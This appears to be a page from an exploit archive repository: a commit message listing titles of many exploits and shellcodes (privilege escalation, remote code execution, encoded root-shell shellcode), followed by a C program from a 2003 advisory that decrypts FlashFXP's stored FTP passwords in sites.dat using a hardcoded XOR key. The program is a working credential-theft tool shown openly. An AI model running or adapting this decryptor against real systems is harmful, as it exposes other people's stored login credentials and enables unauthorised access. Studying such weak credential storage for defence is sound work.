880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
40 lines
No EOL
1.2 KiB
C
40 lines
No EOL
1.2 KiB
C
// source: https://www.securityfocus.com/bid/7499/info
|
|
|
|
FlashFXP uses a trivially reversible algorithm to encrypt FTP user credentials. Local attackers with access to the sites.data may exploit this weakness to gain unauthorized access to FTP user credentials for remote sites.
|
|
|
|
/* Flashfxp sites.dat decryption
|
|
* By: Dvdman@l33tsecurity.com
|
|
* L33tsecurity 2003
|
|
*/
|
|
#include <math.h>
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
|
|
#define VERSION 1
|
|
|
|
|
|
char magic[] ={ 0x79,0x41,0x33, 0x36, 0x7A, 0x41, 0x34 ,0x38, 0x64, 0x45 ,0x68, 0x66, 0x72, 0x76, 0x67 ,0x68,
|
|
0x47, 0x52, 0x67, 0x35, 0x37, 0x68, 0x35, 0x55, 0x6C ,0x44 ,0x76, 0x33 ,0x00 ,0x00 ,0x00, 0x00, };
|
|
|
|
char b[]={ 0x36,0xd8,0x7f,0xc2,0x07,0x16,0xc3};
|
|
/* kernel */
|
|
|
|
//char b[]={ 0x74, 0x92, 0x43 ,0x9C, 0x25, 0xEE ,0x27, 0xA1, 0x2D, 0xC2, 0x77, 0x84,};
|
|
|
|
|
|
int main(int argc, char **argv)
|
|
{
|
|
unsigned char temp;
|
|
unsigned char out[128];
|
|
int i;
|
|
temp = b[0];
|
|
for (i = 1; i < sizeof(b); i++)
|
|
{
|
|
out[i - 1] = (b[i] ^ magic[i - 1]) - temp - (i + 1) % 2;
|
|
temp = b[i % 29];
|
|
};
|
|
|
|
out[i - 1] = 0;
|
|
printf("DECRYPTED PASSWORD IS: %s\n",(char *)&out);
|
|
return 0;
|
|
} |